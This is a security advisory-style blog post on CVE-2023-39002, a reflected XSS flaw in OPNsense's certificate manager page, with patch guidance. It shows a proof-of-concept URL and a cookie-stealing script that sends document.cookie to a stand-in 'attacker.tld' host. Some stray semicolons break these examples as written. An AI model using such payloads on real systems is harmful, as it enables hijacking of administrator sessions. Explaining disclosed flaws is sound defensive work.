CVE CyberSecurity Database News

CVE-2023-39002 - Breaking Down the OPNsense 23.7 XSS Vulnerability in `system_certmanager.php` (with PoC)

Poster -

CVE-2023-39002 is a recently discovered cross-site scripting (XSS) vulnerability in OPNsense’s system_certmanager.php script. Affecting versions before 23.7, this security issue lets attackers execute arbitrary web scripts in the context of the logged-in user—even admins—by tricking them into clicking a specifically crafted link.

> If your firewall or a client is running OPNsense before version 23.7, you should patch immediately.

In this post, I’ll explain the vulnerability, show how the exploit works with a code snippet, and provide links to official references.

What is CVE-2023-39002?

CVE-2023-39002 is a reflected XSS bug. The root of the flaw lies in improper handling of the act GET parameter on OPNsense’s Certificate Manager page (system_certmanager.php). When user input is not properly sanitized, an attacker can inject JavaScript or HTML, which then executes in the victim’s browser.

The act parameter is included in the page response without proper sanitization.

- Any user with access to the firewall's web GUI and a way to click on a malicious link (e.g. phishing email, malicious website) becomes a target.

Example vulnerable URL

https://<opnsense-firewall>/system_certmanager.php?act=<payload>;

Minimal Proof of Concept (PoC) Exploit

Suppose the attacker wants to run alert(1) in the administrator’s browser. Here’s a simple exploit URL:

https://FIREWALL-HOSTNAME/system_certmanager.php?act=%3Cscript%3Ealert(1)%3C%2Fscript%3E

Decoded, the %3Cscript%3Ealert(1)%3C%2Fscript%3E part means <script>alert(1)</script>.

Code Snippet - Vulnerable Portion

Here’s a simplified representation of the server-side PHP code with the XSS flaw (as observed in OPNsense 23.1):

<?php
$act = $_GET['act'] ?? '';
// ...other code...
echo "<div>".$act."</div>";

In this snippet, $act is output unsanitized, so if it contains <script>, it gets executed by the browser.

Let’s say an attacker wants to steal admin cookies. The payload could be

<script>fetch('https://attacker.tld/cookie?c='; + document.cookie)</script>

URL-encoded, it becomes

https://FIREWALL-HOSTNAME/system_certmanager.php?act=%3Cscript%3Efetch('https://attacker.tld/cookie?c=';%2Bdocument.cookie)%3C%2Fscript%3E

When the victim clicks this, their cookies are sent to the attacker.

Upgrade OPNsense to version 23.7 or newer.

- Download Page
   - Upgrade Instructions

Original References and Resources

- NVD Entry - CVE-2023-39002
- OPNsense changelog 23.7
- VulDB Entry

Conclusion

CVE-2023-39002 is a serious but simple-to-exploit XSS in OPNsense’s certificate management UI. It highlights why input sanitization is critical in web apps—even in firewall interfaces. Anyone running OPNsense versions before 23.7 should patch their system as soon as possible.

Stay safe. Don’t delay your updates!

If you want a demo or need a forensic analysis in case of compromise, contact your cybersecurity professional or check OPNsense support.

Timeline

Published on: 08/09/2023 19:15:00 UTC
Last modified on: 08/15/2023 15:07:00 UTC